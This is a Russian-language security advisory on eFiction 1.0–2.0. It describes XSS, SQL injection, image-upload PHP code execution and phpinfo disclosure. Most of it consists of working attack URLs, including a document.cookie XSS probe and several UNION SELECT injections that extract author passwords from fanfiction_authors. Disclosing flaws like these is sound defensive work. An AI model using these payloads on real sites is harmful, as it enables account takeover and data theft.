Программа: eFiction 1.0, 1.1 и 2.0.
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к
потенциально важным данным, произвести XSS нападение и SQL-инъекцию и выполнить
произвольный PHP сценарий на системе.
1. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в
параметре "let" сценария "titles.php". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого сайта.
Пример:
efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlist& let=<script>alert(document.cookie)</script>
efiction 2.0 посредством SQL-инъекции:
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,'<script>alert (document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
2. SQL-инъекция возможна из-за недостаточной обработки входных данных в
параметрах “let”, “sid” и “uid” в различных сценариях. Удаленный пользователь
может с помощью специально сформированного URL выполнить произвольные SQL
команды в базе данных приложения.
Пример:
efiction 1.0:
http://[target]/[path]/authors.php?action=viewlist&let=
'%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlist&let=
%27%20UNION%20SELECT%20password,password
%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://[target]/[path]/titles.php?action=viewlist&let=
'%20UNION%20SELECT%200,0,password,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20 FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20fanfiction_authors%20/*
efiction 1.1:
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,password,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM %20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20password,0,0,0,0,0,
penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20penname,0,0,0,0,0,0,
0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,
password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%
20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,
0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%20penname,penname,password,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname%20FROM%20fanfiction_authors%20/*
efiction 2.0
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,penname,0%20FROM%20fanfiction_authors%20/*
3. Уязвимость в "Manage Images" позволяет удаленному пользователю загрузить
валидные изображения с произвольным расширением. Удаленный пользователь может
загрузить валидное изображение, содержащее PHP код и выполнить его с
привилегиями web сервера.
4. Удаленный пользователь может запросить сценарий "phpinfo.php" и получить
потенциально важную информацию о системе.